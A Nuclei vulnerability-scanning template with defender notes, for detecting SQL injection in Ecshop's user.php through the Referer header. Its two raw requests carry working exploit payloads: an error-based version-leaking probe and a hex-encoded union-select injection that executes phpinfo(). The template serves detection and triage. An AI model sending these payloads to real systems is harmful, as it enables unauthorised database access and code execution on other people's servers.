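# Nuclei template: detects the Ecshop user.php SQL injection reached through
# the HTTP Referer header. The template body was collapsed onto one line on
# this page; the structure below restores the YAML layout without changing
# any request bytes or matcher strings.
id: ecshop-sqli

info:
  name: Ecshop SQLi
  author: Lark-lab,ImNightmaree,ritikchaddha
  severity: high
  description: A vulnerability in Ecshop allows remote unauthenticated users to inject arbitrary SQL statements via the 'Referer' header field.
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
    - http://www.wins21.com/mobile/blog/blog_view.html?num=1172
  tags: sqli,php,ecshop

# Notes for defenders:
# - Both probes carry a serialized PHP array (`a:2:{s:3:"num";...}`) in the
#   Referer header of a request to /user.php?act=login. A Referer on that path
#   that contains serialized-array syntax is a usable log/WAF signature.
# - Affected and fixed Ecshop versions are not stated in this template; confirm
#   them against the vendor advisory before closing a finding.
# - Request 2 is not read-only: a hit on the second matcher means phpinfo()
#   output was rendered, so the finding is code execution, not only SQL
#   injection. Triage such hits above the template's stated `high` severity.

requests:
  - raw:
      # Request 1: error-based probe. A vulnerable host answers with a MySQL
      # XPATH error, which the first matcher looks for.
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

      # Request 2: confirms the follow-on code-execution path; the second
      # matcher looks for phpinfo() page markers in the response.
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"'/*";}554fcae493e564ee0dc75bdf2ebf94ca

    # Either matcher is sufficient; within a matcher every word must be present.
    matchers-condition: or
    matchers:
      # SQL error dump produced by request 1. All four strings are required,
      # which keeps a generic MySQL error page from matching.
      - type: word
        words:
          - 'XPATH syntax error:'
          - '[error] =>'
          - '[0] => Array'
          - 'MySQL server error report:Array'
        condition: and

      # phpinfo() markers produced by request 2. These two strings appear on
      # any phpinfo page and there is no status or path constraint, so verify
      # a hit manually before reporting it.
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and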